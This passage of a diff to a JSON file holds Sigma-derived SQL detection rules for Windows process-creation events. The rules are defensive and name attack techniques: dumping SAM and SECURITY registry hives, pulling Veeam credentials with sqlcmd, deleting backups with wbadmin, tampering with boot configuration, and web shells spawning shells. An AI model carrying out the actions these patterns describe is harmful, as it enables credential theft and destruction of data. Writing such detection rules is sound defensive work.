ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "author": "Florian Roth (Nextron Systems)", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "status": "experimental", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel 
= 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "Legitimate use" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. 
This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE 
'%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "author": "frack113", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so 
that it is less embarrassing" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "status": "test", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.impact", + 
"attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') 
AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
+ "Legitimate administrators granting over permissive permissions to users" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + }, + { + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "status": "test", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ], + "falsepositives": [ + "Legitimate use of debugging tools" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": 
"proc_creation_win_lolbin_cdb.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], + "falsepositives": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + }, + { + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "status": 
"experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE 
'%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216" ], "falsepositives": [ - "Legitimate PowerShell scripts" + 